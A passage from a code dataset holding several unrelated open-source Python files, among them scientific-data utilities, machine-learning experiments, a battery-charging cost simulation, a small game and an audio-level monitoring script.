print('Cannot open: {}'.format(keys_file))\n sys.exit(1)\n\n return keys\n\n\ndef open_hdr(file_to_open):\n hdr = fits.getheader(file_to_open)\n\n return hdr\n\n\ndef show_keys(name, keys, hdr):\n\n output_keys = []\n\n for key in keys:\n try:\n hdr_key = hdr[key]\n if not args.miss:\n output_keys.append([key, hdr_key])\n except KeyError:\n output_keys.append([key, 'Not found'])\n\n if len(output_keys) > 0:\n print('')\n print('File: {}'.format(name))\n\n for key, value in output_keys:\n print('{}: {}'.format(key, value))\n\n\ndef main():\n keys = load_keys(args.keys)\n for root, _, files in os.walk('.'):\n for name in files:\n if name.endswith(args.ext):\n hdr = open_hdr(os.path.join(root, name))\n show_keys(name, keys, hdr)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Show FITS hdr keys')\n parser.add_argument('-m', '--miss', action='store_true',\n help='If set program will show only missing keys')\n parser.add_argument('--keys', type=str, default=os.path.join(\n os.path.dirname(os.path.realpath(__file__)), 'keys.txt'),\n nargs='?', help='Dir to file with keys to show, '\n 'Default: keys.txt on program dir')\n parser.add_argument('--ext', type=str, default='.fits',\n nargs='?', help='File to open, '\n 'Default: .fits')\n 
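# defaults above: keys.txt next to this script and the .fits extension\n    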
args = parser.parse_args()\n\n    main()\n","repo_name":"MichalZG/showHdrKeys","sub_path":"showHdrKeys.py","file_name":"showHdrKeys.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23754796606","text":"import pandas as pd\nimport sys\nimport io\nimport time\nimport numpy as np\nfrom datetime import datetime\nimport nltk\nimport re\nfrom nltk.corpus import stopwords\nfrom string import punctuation\nfrom sklearn.feature_extraction.text import CountVectorizer, HashingVectorizer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn import metrics\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.base import clone\nimport glob\nfrom sklearn.metrics import classification_report\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.linear_model import SGDClassifier, PassiveAggressiveClassifier, Perceptron\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\nimport pathlib\n\ndef get_pipe_list(algs):\n    \"\"\"\n    Function meant to generate a list of pipelines with several different algorithms and parameters.\n    \"\"\"\n    pipelist = []\n    \n    for j in range(0, len(algs)):\n        pipelist.append(Pipeline([('vect', HashingVectorizer(analyzer=\"word\", stop_words = set(stopwords.words('portuguese') + list(punctuation)))),\n                        ('tfidf', TfidfTransformer()), \n                        ('clf', clone(algs[j])),]))\n    return pipelist\n\ndef get_true_false(lista):\n    zipped = [[sum(item) for item in zip(items)] for items in zip(*lista)]\n    TList = []\n    FList = []\n    for i in range(0, len(lista)):\n        ipred = sum(zipped[i])\n        Tpred = lista[i][i]\n        TList.append(Tpred) \n        FList.append(ipred - Tpred)\n    return TList + FList\n\n\n#Getting the path of the current directory\npath = str(pathlib.Path().absolute()) \n\n#Spreadsheets for training and testing\ntrain_np = pd.read_csv(path+'\\\\Planilhas\\\\train_test\\\\train_np.csv')\ntest_np = pd.read_csv(path+'\\\\Planilhas\\\\train_test\\\\test_np.csv')\ntrain_neutral = pd.read_csv(path+'\\\\Planilhas\\\\train_test\\\\train_neutral.csv')\ntest_neutral = pd.read_csv(path+'\\\\Planilhas\\\\train_test\\\\test_neutral.csv')\n\ndf_list =[[train_np, test_np], [train_neutral, test_neutral]]\ntestes = [\"without neutral news, balanced\", \"with neutral news, balanced\"]\nparamList = ['n-gram(1,1)', 'n-gram(1,2)']\nalgoList = ['Decision Tree']\n\n#creating the list of pipelines\n#params = {'n-grams': [(1,1), (1,2)]}\n#pipelist = get_pipe_list([MultinomialNB(), SGDClassifier(), Perceptron(), DecisionTreeClassifier(), PassiveAggressiveClassifier(), RandomForestClassifier()])\npipelist = [Pipeline([('vect', CountVectorizer(analyzer=\"word\", stop_words = set(stopwords.words('portuguese') + list(punctuation)))),\n                        ('tfidf', TfidfTransformer()), \n                        ('clf', DecisionTreeClassifier())])]\n#dictionary with parameters for the pipeline components that come before the algorithm itself\nparam_dict = {'vect__ngram_range': [(1, 1), (1, 2)],\n              'tfidf__use_idf': (True, False),\n              'tfidf__norm': ('l1', 'l2'),}\n\n#List of dictionaries with parameters for the algorithms\nparameter_list = [{'clf__max_depth': (15, 35),\n    'clf__min_samples_split': (75, 125),\n    'clf__min_samples_leaf': (25, 35),\n    'clf__max_features': (0.5, 'sqrt'),\n    'clf__criterion': ('gini', 'entropy'),\n}]\n\ncmp = pd.DataFrame(columns = [\"Algoritmo\", 
\"Parâmetros\", \"Parâmetros testados\", \"Melhores parâmetros\", \"Tipo\", \"Acurácia\", \"Duração Treino\", \"Duração Teste\", \"FN\", \"FP\", \"FNT\", \"TN\", \"TP\", \"TNT\", \"Precisão\", \"F1\", \"Recall\", \"N_treino\", \"N_teste\"])\ndic_list = []\n\nfor i in range(0, 1):\n\n    #Preparing the lists of news items and labels for training and testing\n    \n    train_news = df_list[i][0]\n    train_classif = train_news[\"Modelo\"]\n    train_news = train_news[\"Notícia\"]\n    test_news = df_list[i][1]\n    test_classif = test_news[\"Modelo\"]\n    test_news = test_news[\"Notícia\"]\n    if(\"Neutro\" in train_classif):\n        lista = ['Negativo', 'Neutro', 'Positivo']\n    else:\n        lista = ['Negativo', 'Positivo']\n    n_treino = len(train_news)\n    \n    for j in range(0, len(pipelist)):\n        params = dict(**param_dict, **parameter_list[0])\n        randomS = RandomizedSearchCV(pipelist[j], params, cv=3, n_jobs=10, pre_dispatch=8, n_iter=10) #randomized search object\n        time_train = time.time() #tracking elapsed time during training\n        randomS.fit(train_news, train_classif) #training the algorithm\n        time_train = time.time() - time_train\n        print(time_train)\n        time_test = time.time() #tracking elapsed time during testing\n        predicted = randomS.predict(test_news) #testing the algorithm\n        time_test = time.time() - time_test\n        print(time_test)\n        \n        cm = metrics.confusion_matrix(np.asarray(test_classif), predicted, labels = lista)\n        \n        if('Neutro' not in lista):\n            tn, fp, fn, tp = cm.ravel()\n            tnt, fnt = ['N/A', 'N/A']\n        else: tn, tnt, tp, fn, fnt, fp = get_true_false(cm)\n        #classification report (with precision, accuracy, f1, recall etc. from the algorithm's test)\n        cr = metrics.classification_report(np.asarray(test_classif), predicted, target_names=lista, zero_division=1, output_dict=True)\n        #transferring the test data into a dictionary\n        dic = {\"Algoritmo\" : algoList[j],\n               \"Parâmetros testados\" : \"\\n\".join([j for j in sorted(params.keys())]),\n               \"Melhores parâmetros\" : \"\\n\".join([\"%s: %r\" % (param_name, randomS.best_params_[param_name]) for param_name in sorted(params.keys())]),\n               \"Tipo\" : testes[i],\n               \"Acurácia\" : randomS.score(test_news, test_classif),\n               \"Duração Treino\" : time_train,\n               \"Duração Teste\" : time_test,\n               \"FN\" : fn,\n               \"FNT\" : fnt, \n               \"FP\" : fp, \n               \"TN\" : tn, \n               \"TNT\" : tnt, \n               \"TP\" : tp, \n               \"Precisão\" : cr[\"macro avg\"][\"precision\"], \n               \"F1\" : cr[\"macro avg\"][\"f1-score\"], \n               \"Recall\" : cr[\"macro avg\"][\"recall\"], \n               \"N_treino\" : n_treino, \n               \"N_teste\" : cr[\"macro avg\"][\"support\"]}\n\n        print(f\"The accuracy of the {testes[i]} test using the {algoList[j]} algorithm is: \")\n        print(dic[\"Acurácia\"])\n        print(f\"\\nTraining and testing took {time_train + time_test} seconds.\\n\")\n        print(\"-------------------------------- Standardized tests ---------------------\")\n        print(\"Best parameters set found on development set:\")\n        print()\n        print(randomS.best_params_)\n        print()\n        print(\"Grid scores on development set:\")\n        print()\n        means = randomS.cv_results_['mean_test_score']\n        stds = randomS.cv_results_['std_test_score']\n        for mean, std, params in zip(means, stds, randomS.cv_results_['params']):\n            print(\"%0.3f (+/-%0.03f) for %r\"\n                  % (mean, std * 2, params))\n        print()\n\n        print(\"Detailed classification report:\")\n        print()\n        print(\"The model is trained on the full development set.\")\n        print(\"The scores are computed on the full evaluation set.\")\n        print()\n        print(classification_report(test_classif, predicted))\n        print()\n\n        
dic_list.append(dic)\n\n#A dataframe is built from the list of dictionaries\ncmp = pd.DataFrame(dic_list, columns = [\"Algoritmo\", \"Parâmetros testados\", \"Melhores parâmetros\", \"Tipo\", \"Acurácia\", \"Duração Treino\",\"Duração Teste\", \"FN\", \"FNT\", \"FP\", \"TN\", \"TNT\", \"TP\", \"Precisão\", \"F1\", \"Recall\", \"N_treino\", \"N_teste\"])\n\n\n\n","repo_name":"Vitor-Tx/Python-projects","sub_path":"dataScience/improved_grid_search.py","file_name":"improved_grid_search.py","file_ext":"py","file_size_in_byte":7689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31872084187","text":"import random\n\n\ndef random_choice():\n    random_list = [\"R\", \"P\", \"S\"]\n    return random.choice(random_list)\n\n\ndef you_lose():\n    print(f\"My choice was '{my_choice}', you lose!\")\n    print(\"Let's play one more time\")\n\n\ndef you_win():\n    print(f\"My choice was '{my_choice}', you win!\")\n    print(\"Congratulations!!!\")\n    print(\"Let's play one more time\")\n\n\ndef draw():\n    print(f\"My choice was '{my_choice}' too! No Winner! \")\n    print(\"Let's play one more time\")\n\n\nprint(\"Let's play Rock Paper Scissors!\")\nwhile True:\n    your_choice = input(\"Choose one: Rock, Paper or Scissors? R/P/S: \").upper()\n    my_choice = random_choice()\n    if your_choice == my_choice:\n        draw()\n    elif your_choice == \"R\":\n        if my_choice == \"P\":\n            you_lose()\n        elif my_choice == \"S\":\n            you_win()\n    elif your_choice == \"P\":\n        if my_choice == \"S\":\n            you_lose()\n        elif my_choice == \"R\":\n            you_win()\n    elif your_choice == \"S\":\n        if my_choice == \"R\":\n            you_lose()\n        elif my_choice == \"P\":\n            you_win()\n    else:\n        print(\"Please type only 'R', 'P' or 'S'\")\n    print(50 * \"*\")","repo_name":"python1818/python_principles","sub_path":"practice_python/04_Rock Paper Scissors2.py","file_name":"04_Rock Paper Scissors2.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15348858651","text":"import math\n\nimport pytest\nimport tensorflow as tf\nimport numpy as np\n\nfrom tavolo.learning import CyclicLearningRateCallback\n\n\ndef test_logic():\n    \"\"\" Test logic on known input \"\"\"\n\n    # -------- TRIANGULAR --------\n\n    # Input\n    input_2d = np.random.normal(size=(1000, 20))\n    labels = np.random.randint(low=0, high=2, size=1000)\n\n    # Create model\n    model = tf.keras.Sequential([tf.keras.layers.Input(shape=(20,)),\n                                 tf.keras.layers.Dense(10, activation=tf.nn.relu),\n                                 tf.keras.layers.Dense(1, activation=tf.nn.sigmoid)])\n    model.compile(optimizer=tf.keras.optimizers.SGD(), loss='binary_crossentropy')\n\n    # Create callback\n    clr = CyclicLearningRateCallback()\n    expected_lr_values = list(np.linspace(0.001, 0.006, 2000))\n    expected_lr_values = expected_lr_values + expected_lr_values[::-1]  # Triangle\n\n    # Run model\n    model.fit(input_2d, labels, batch_size=10, epochs=5, callbacks=[clr], verbose=0)\n\n    assert all(math.isclose(a, b, rel_tol=0.001) for a, b in zip(clr.history['lr'], expected_lr_values))\n\n    # -------- TRIANGULAR2 --------\n\n    # Create model\n    model = tf.keras.Sequential([tf.keras.layers.Input(shape=(20,)),\n                                 tf.keras.layers.Dense(10, activation=tf.nn.relu),\n                                 tf.keras.layers.Dense(1, activation=tf.nn.sigmoid)])\n    model.compile(optimizer=tf.keras.optimizers.SGD(), loss='binary_crossentropy')\n\n    clr = CyclicLearningRateCallback(scale_scheme='triangular2')\n\n    model.fit(input_2d, labels, batch_size=10, epochs=5, callbacks=[clr], verbose=0)\n\n    # -------- EXPONENT 
RANGE --------\n\n    # Create model\n    model = tf.keras.Sequential([tf.keras.layers.Input(shape=(20,)),\n                                 tf.keras.layers.Dense(10, activation=tf.nn.relu),\n                                 tf.keras.layers.Dense(1, activation=tf.nn.sigmoid)])\n    model.compile(optimizer=tf.keras.optimizers.SGD(), loss='binary_crossentropy')\n\n    clr = CyclicLearningRateCallback(scale_scheme='exp_range')\n\n    model.fit(input_2d, labels, batch_size=10, epochs=5, callbacks=[clr], verbose=0)\n\n    # -------- CUSTOM SCALING --------\n\n    # Create model\n    model = tf.keras.Sequential([tf.keras.layers.Input(shape=(20,)),\n                                 tf.keras.layers.Dense(10, activation=tf.nn.relu),\n                                 tf.keras.layers.Dense(1, activation=tf.nn.sigmoid)])\n    model.compile(optimizer=tf.keras.optimizers.SGD(), loss='binary_crossentropy')\n\n    scale_fn = lambda x: 0.5 * (1 + np.sin(x * np.pi / 2.))\n    clr = CyclicLearningRateCallback(scale_mode='cycle', scale_fn=scale_fn)\n\n    model.fit(input_2d, labels, batch_size=10, epochs=5, callbacks=[clr], verbose=0)\n\n\ndef test_exceptions():\n    \"\"\" Test for expected exceptions \"\"\"\n\n    # Unsupported scale scheme should raise\n    with pytest.raises(ValueError) as excinfo:\n        CyclicLearningRateCallback(scale_scheme='wrong_value')\n\n    assert 'is not a supported scale scheme' in str(excinfo.value)\n","repo_name":"eliorc/tavolo","sub_path":"tests/learning/cyclic_learning_rate_callback_test.py","file_name":"cyclic_learning_rate_callback_test.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"48"} +{"seq_id":"24543744020","text":"class StatisticsClassification:\n    \n    def __init__(\n        self,\n        Accuracy = 0,\n        BalancedAccuracy = 0,\n        Precision = 0,\n        Recall = 0,\n        F1Score = 0,\n        HammingLoss = 0,\n        CrossEntropyLoss = 0,\n        ConfusionMatrix = []\n    ) -> None:\n        \n        self.Accuracy = str(float(Accuracy))\n        self.BalancedAccuracy = str(float(BalancedAccuracy))\n        self.Precision = str(float(Precision))\n        self.Recall = str(float(Recall))\n        self.F1Score = str(float(F1Score))\n        self.HammingLoss = str(float(HammingLoss))\n        self.CrossEntropyLoss = str(float(CrossEntropyLoss))\n        self.ConfusionMatrix = [[int(i) for i in row] for row in ConfusionMatrix]\n        \n    ","repo_name":"android172/Igrannonica","sub_path":"src/ml/Models/StatisticsClassification.py","file_name":"StatisticsClassification.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10364614138","text":"# Generally you shouldn't use filtered data for GSEA, so the gene_list file should be all the genes in the GTF file\n# Make this file from the TPM file with the commands:\n# tail -n +2 all_samples_TPM.txt > all_samples_TPM_no_header.txt\n# awk '{print $1}' all_samples_TPM_no_header.txt > complete_gene_list.txt\n\n# Syntax: python GSEA_file_creation.py gene_list TPM_file outfile\n\nimport sys\n\n# Check if files are there\n\nif len(sys.argv) < 4:\n    print(\"Not enough files, rerun program\")\n    sys.exit()\n\n# Take in filenames from command line\n\nfile1 = sys.argv[1]\nfile2 = sys.argv[2]\noutfile = sys.argv[3]\n\ndata1 = []\ndata2 = []\n\n# Read in gene_list \n\nwith open(file1) as f:\n    for line in f:\n        split_cols = line.split('\\n')\n        data1.append(split_cols[0])\n\n# Process TPM file\n\ni = 0\n\nwith open(file2) as f:\n    for line in f:\n        if i > 0:\n            split_cols = line.split(\"\\n\")\n            split_cols = split_cols[0].split(\"\\t\")\n            data2.append(split_cols)\n        else:\n            header = line.split('\\n')\n            header = header[0].split(\"\\t\")\n            i = i + 1\n\n# Find 
matches and record indices of matches\n\nTPM_gene_list = list(zip(*data2))[0]\ngene_row = []\n\nfor i in range(len(data1)):\n    gene_row.append(TPM_gene_list.index(data1[i]))\n\n# Make GCT file\n\nwith open(outfile, 'wt') as f:\n    f.write('#1.2\\n')\n    f.write(str(len(data1)))\n    f.write('\\t')\n    f.write(str(len(header)))\n    f.write('\\n')\n    f.write('Gene\\tDescription\\t')\n    f.write('\\t'.join(header[:]))\n    f.write('\\n')\n    for i in range(len(gene_row)):\n        f.write(TPM_gene_list[gene_row[i]].upper())\n        f.write('\\t')\n        f.write(TPM_gene_list[gene_row[i]])\n        f.write('\\t')\n        f.write('\\t'.join(data2[gene_row[i]][1:]))\n        f.write('\\n')\n\n","repo_name":"lynn-sanford/RNASeq_processing_scripts","sub_path":"08_downstream/GSEA/GSEA_file_creation.py","file_name":"GSEA_file_creation.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41343192200","text":"from copy import deepcopy\nimport os\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\n\nfrom battery_controller import BatteryContoller\nfrom battery import Battery\n\n\nclass Simulation(object):\n    \"\"\" Handles running a simulation.\n    \"\"\"\n    def __init__(self,\n                 data,\n                 battery,\n                 site_id):\n        \"\"\" Creates initial simulation state based on data passed in.\n\n        :param data: contains all the time series needed over the considered period\n        :param battery: is a battery instantiated with 0 charge and the relevant properties\n        :param site_id: the id for the site (building)\n        \"\"\"\n\n        self.data = data\n\n        # building initialization\n        self.actual_previous_load = self.data.actual_consumption.values[0]\n        self.actual_previous_pv = self.data.actual_pv.values[0]\n\n        # align actual as the following, not the previous 15 minutes to\n        # simplify simulation\n        self.data.loc[:, 'actual_consumption'] = self.data.actual_consumption.shift(-1)\n        self.data.loc[:, 'actual_pv'] = self.data.actual_pv.shift(-1)\n\n        self.site_id = site_id\n        self.load_columns = data.columns.str.startswith('load_')\n        self.pv_columns = data.columns.str.startswith('pv_')\n        self.price_sell_columns = data.columns.str.startswith('price_sell_')\n        self.price_buy_columns = data.columns.str.startswith('price_buy_')\n\n        # initialize money at 0.0\n        self.money_spent = 0.0\n        self.money_spent_without_battery = 0.0\n\n        # battery initialization\n        self.battery = battery\n\n    def run(self):\n        \"\"\" Executes the simulation by iterating through each of the data points\n            It returns both the electricity cost spent using the battery and the\n            cost that would have been incurred with no battery.\n        \"\"\"\n        battery_controller = BatteryContoller()\n\n        for current_time, timestep in tqdm(self.data.iterrows(), total=self.data.shape[0], desc=' > > > > timesteps\\t'):\n            # can't calculate results without actual, so skip (should only be last row)\n            if pd.notnull(timestep.actual_consumption):\n                self.simulate_timestep(battery_controller, current_time, timestep)\n\n        return self.money_spent, self.money_spent_without_battery\n\n    def simulate_timestep(self, battery_controller, current_time, timestep):\n        \"\"\" Executes a single timestep using `battery_controller` to get\n            a proposed state of charge and then calculating the cost of\n            making those changes.\n\n            :param battery_controller: The battery controller\n            :param current_time: the timestamp of the current time step\n            :param timestep: the data available at this timestep\n        \"\"\"\n        # get proposed state of charge from the battery 
controller\n proposed_state_of_charge = battery_controller.propose_state_of_charge(\n self.site_id,\n current_time,\n deepcopy(self.battery),\n self.actual_previous_load,\n self.actual_previous_pv,\n timestep[self.price_buy_columns],\n timestep[self.price_sell_columns],\n timestep[self.load_columns],\n timestep[self.pv_columns]\n )\n\n # get energy required to achieve the proposed state of charge\n grid_energy, battery_energy_change = self.simulate_battery_charge(self.battery.current_charge,\n proposed_state_of_charge,\n timestep.actual_consumption,\n timestep.actual_pv)\n\n grid_energy_without_battery = timestep.actual_consumption - timestep.actual_pv\n\n # buy or sell energy depending on needs\n price = timestep.price_buy_00 if grid_energy >= 0 else timestep.price_sell_00\n price_without_battery = timestep.price_buy_00 if grid_energy_without_battery >= 0 else timestep.price_sell_00\n\n # calculate spending based on price per kWh and energy per Wh\n self.money_spent += grid_energy * (price / 1000.)\n self.money_spent_without_battery += grid_energy_without_battery * (price_without_battery / 1000.)\n\n # update current state of charge\n self.battery.current_charge += battery_energy_change / self.battery.capacity\n self.actual_previous_load = timestep.actual_consumption\n self.actual_previous_pv = timestep.actual_pv\n\n def simulate_battery_charge(self, initial_state_of_charge, proposed_state_of_charge, actual_consumption, actual_pv):\n \"\"\" Charges or discharges the battery based on what is desired and\n available energy from grid and pv.\n\n :param initial_state_of_charge: the current state of the battery\n :param proposed_state_of_charge: the proposed state for the battery\n :param actual_consumption: the actual energy consumed by the building\n :param actual_pv: the actual pv energy produced and available to the building\n \"\"\"\n # charge is bounded by what is feasible\n proposed_state_of_charge = np.clip(proposed_state_of_charge, 0.0, 1.0)\n\n # calculate proposed energy change in the battery\n target_energy_change = (proposed_state_of_charge - initial_state_of_charge) * self.battery.capacity\n\n # efficiency can be different whether we intend to charge or discharge\n if target_energy_change >= 0:\n efficiency = self.battery.charging_efficiency\n target_charging_power = target_energy_change / ((15. / 60.) * efficiency)\n else:\n efficiency = self.battery.discharging_efficiency\n target_charging_power = target_energy_change * efficiency / (15. / 60.)\n\n # actual power is bounded by the properties of the battery\n actual_charging_power = np.clip(target_charging_power,\n self.battery.discharging_power_limit,\n self.battery.charging_power_limit)\n\n # actual energy change is based on the actual power possible and the efficiency\n if actual_charging_power >= 0:\n actual_energy_change = actual_charging_power * (15. / 60.) * efficiency\n else:\n actual_energy_change = actual_charging_power * (15. / 60.) / efficiency\n\n # what we need from the grid = (the power put into the battery + the consumption) - what is available from pv\n grid_energy = (actual_charging_power * (15. / 60.) 
+ actual_consumption) - actual_pv\n\n        # if positive, we are buying from the grid; if negative, we are selling\n        return grid_energy, actual_energy_change\n\n\nif __name__ == '__main__':\n    simulation_dir = (Path(__file__)/os.pardir/os.pardir).resolve()\n    data_dir = simulation_dir/'data'\n    output_dir = simulation_dir/'output'\n\n    # load available metadata to determine the runs\n    metadata_path = data_dir/'metadata.csv'\n    metadata = pd.read_csv(metadata_path, index_col=0)\n\n    # store results of each run\n    results = []\n\n    # # execute two runs with each battery for every row in the metadata file:\n    for site_id, parameters in tqdm(metadata.iterrows(), desc='sites\\t\\t\\t', total=metadata.shape[0]):\n        site_data_path = data_dir/\"submit\"/f\"{site_id}.csv\"\n\n        if site_data_path.exists():\n            site_data = pd.read_csv(site_data_path,\n                                    parse_dates=['timestamp'],\n                                    index_col='timestamp')\n\n            for batt_id in tqdm([1, 2], desc=' > batteries \\t\\t'):\n                # create the battery for this run\n                # (Note: Quantities in kW are converted to watts here)\n                batt = Battery(capacity=parameters[f\"Battery_{batt_id}_Capacity\"] * 1000,\n                               charging_power_limit=parameters[f\"Battery_{batt_id}_Power\"] * 1000,\n                               discharging_power_limit=-parameters[f\"Battery_{batt_id}_Power\"] * 1000,\n                               charging_efficiency=parameters[f\"Battery_{batt_id}_Charge_Efficiency\"],\n                               discharging_efficiency=parameters[f\"Battery_{batt_id}_Discharge_Efficiency\"])\n\n                # execute the simulation for each simulation period in the data\n                n_periods = site_data.period_id.nunique()\n                for g_id, g_df in tqdm(site_data.groupby('period_id'), total=n_periods, desc=' > > periods\\t\\t'):\n                    # reset battery to no charge before simulation\n                    batt.current_charge = 0\n\n                    sim = Simulation(g_df, batt, site_id)\n                    money_spent, money_no_batt = sim.run()\n\n                    # store the results\n                    results.append({\n                        'run_id': f\"{site_id}_{batt_id}_{g_id}\",\n                        'site_id': site_id,\n                        'battery_id': batt_id,\n                        'period_id': g_id,\n                        'money_spent': money_spent,\n                        'money_no_batt': money_no_batt,\n                        'score': (money_spent - money_no_batt) / np.abs(money_no_batt),\n                    })\n\n    # write all results out to a file\n    results_df = pd.DataFrame(results).set_index('run_id')\n    results_df = results_df[['site_id', 'battery_id', 'period_id', 'money_spent', 'money_no_batt', 'score']]\n    results_df.to_csv(output_dir/'results.csv')\n","repo_name":"drivendataorg/power-laws-optimization","sub_path":"simulation_engine/simulate/simulate.py","file_name":"simulate.py","file_ext":"py","file_size_in_byte":9616,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"48"} +{"seq_id":"16556060712","text":"# Definition for singly-linked list.\n# class ListNode(object):\n#     def __init__(self, val=0, next=None):\n#         self.val = val\n#         self.next = next\nclass Solution(object):\n    def reverseBetween(self, head, left, right):\n        \"\"\"\n        :type head: ListNode\n        :type left: int\n        :type right: int\n        :rtype: ListNode\n        \"\"\"\n        # variable that will hold the rearranged linked list\n        result = dummy = ListNode()\n        # variable that will hold the in-range nodes, reassembled in reverse order\n        rev = reverse = ListNode()\n        # counter used to check whether a node falls inside the range\n        count = 1\n        # iterate to the end of the linked list\n        while head:\n            # when the position is inside the range\n            if count in range(left, right+1):\n                # at the start of the range only change val (so the tail of the reversed list does not end up as 0)\n                if count == left:\n                    rev.val = head.val\n                # otherwise link rev as the next node, wrapping head's value in a new node assigned to rev (reverse ordering)\n                else:\n                    rev = ListNode(head.val, rev)\n                # after the checks above, at the end of the range point the waiting dummy list's next pointer \n                # at the head of the reversed list, then move dummy to the tail of the reversed list \n                if count == right:\n                    dummy.next = rev\n                    
dummy = reverse\n            # when the position is outside the range, point the dummy list's next pointer at the current head and move to the next pointer\n            else:\n                dummy.next = head\n                dummy = dummy.next\n            # advance the linked list to the next pointer\n            head = head.next\n            count += 1\n        # the starting node's val is 0 and the answer begins at its next pointer, so return the next pointer\n        return result.next","repo_name":"junhong625/MOCOCO","sub_path":"[2주차] 연결리스트(LinkdedList)/[LeetCode 92번] Reverse Linked List 2/안준홍_역순 연결리스트 따로 합치기.py","file_name":"안준홍_역순 연결리스트 따로 합치기.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"14283271641","text":"# Author Z\nimport tornado.web\nfrom controllers import home\n\nsettings = {\n    \"template_path\":\"views\",\n    \"static_path\":\"statics\",\n    'static_url_prefix':'/statics/',\n}\n\napplication = tornado.web.Application([\n    (r\"/index/(?P<page>\\d*)\",home.IndexHandler),\n],**settings)\n\nif __name__ == '__main__':\n    application.listen(8005)\n    tornado.ioloop.IOLoop.instance().start()","repo_name":"cosmosy-z/python-fenye","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6638071202","text":"#!/usr/bin/python\n\"\"\"\nThe script opens an ALSA pcm for sound capture. It sets various attributes\nof the capture, reads in a loop, then prints the volume.\n\nTo test it out, run it and shout at your microphone.\n\nRequired: libasound2-dev\nRPi:\n# Keep snd-usb-audio from being loaded as first soundcard\n#options snd-usb-audio index=-2\n\nSee the associated article:\n    http://ampledata.org/blue_angels_flyover_detection_using_splunk.html\n\nSource: https://github.com/ampledata/sounding\n\"\"\"\n\n__author__ = 'Greg Albrecht '\n__copyright__ = 'Copyright 2015 Greg Albrecht'\n__license__ = 'Apache License, Version 2.0'\n\n\nimport alsaaudio\n\nimport audioop\nimport math\nimport os\nimport socket\nimport sys\nimport time\n\n\nCHANNELS = 1  # Mono\nRATE = 8000  # 8 kHz\nFORMAT = alsaaudio.PCM_FORMAT_S16_LE  # 16bit Little Endian\n\n# http://stackoverflow.com/questions/2445756/how-can-i-calculate-audio-db-level\nMAX_AMPLITUDE = 32767\n\n# The period size controls the internal number of frames per period.\n# The significance of this parameter is documented in the ALSA api.\n# For our purposes, it is sufficient to know that reads from the device\n# will return this many frames. Each frame being 2 bytes long.\n# This means that the reads below will return either 320 bytes of data\n# or 0 bytes of data. 
The latter is possible because we are in nonblocking\n# mode.\nPERIODSIZE = 160\n\n# Seconds to sleep between samples\nSLEEP = .01\n\nCOLLECTD_HOST = os.environ.get('COLLECTD_HOST')\nCOLLECTD_PORT = os.environ.get('COLLECTD_PORT', 2003)\n\n\ndef collect_metric(name, value, timestamp, prefix='sounding'):\n metric_name = '.'.join([prefix, name])\n sock = socket.socket()\n sock.connect((COLLECTD_HOST, COLLECTD_PORT) )\n sock.send(\"%s %d %d\\n\" % (metric_name, value, timestamp))\n sock.close()\n\n\ndef setup_audio():\n inp = alsaaudio.PCM(alsaaudio.PCM_CAPTURE, alsaaudio.PCM_NONBLOCK)\n inp.setchannels(CHANNELS)\n inp.setrate(RATE)\n inp.setformat(FORMAT)\n inp.setperiodsize(PERIODSIZE)\n return inp\n\n\ndef main():\n audio = setup_audio()\n\n while 1:\n data_len, data = audio.read()\n if data_len:\n try:\n audio_max = audioop.max(data, 2)\n audio_rms = audioop.rms(data, 2)\n amplitude = float(audio_max) / float(MAX_AMPLITUDE)\n dBg = 20 * math.log10(amplitude)\n timestamp = time.time()\n collect_metric('audio_rms', audio_rms, timestamp)\n collect_metric('audio_max', audio_max, timestamp)\n collect_metric('amplitude', amplitude, timestamp)\n collect_metric('dBg', dBg, timestamp)\n time.sleep(SLEEP)\n except audioop.error:\n pass\n except ValueError:\n pass\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"ampledata/sounding","sub_path":"sounding.py","file_name":"sounding.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24034710005","text":"from abc import abstractmethod\n\nimport numpy as np\nimport scipy.integrate\nimport scipy.optimize\nfrom beartype import beartype\nfrom scipy.integrate import nquad\n\nfrom ..hypertorus.custom_hypertoroidal_distribution import (\n CustomHypertoroidalDistribution,\n)\nfrom ..nonperiodic.custom_linear_distribution import CustomLinearDistribution\nfrom .abstract_lin_periodic_cart_prod_distribution import (\n AbstractLinPeriodicCartProdDistribution,\n)\n\n\nclass AbstractHypercylindricalDistribution(AbstractLinPeriodicCartProdDistribution):\n def __init__(\n self, bound_dim: int | np.int32 | np.int64, lin_dim: int | np.int32 | np.int64\n ):\n AbstractLinPeriodicCartProdDistribution.__init__(self, bound_dim, lin_dim)\n\n @abstractmethod\n def pdf(self, xs):\n pass\n\n def integrate(self, integration_boundaries=None):\n return self.integrate_numerically(integration_boundaries)\n\n def integrate_numerically(self, integration_boundaries=None):\n if integration_boundaries is None:\n integration_boundaries = 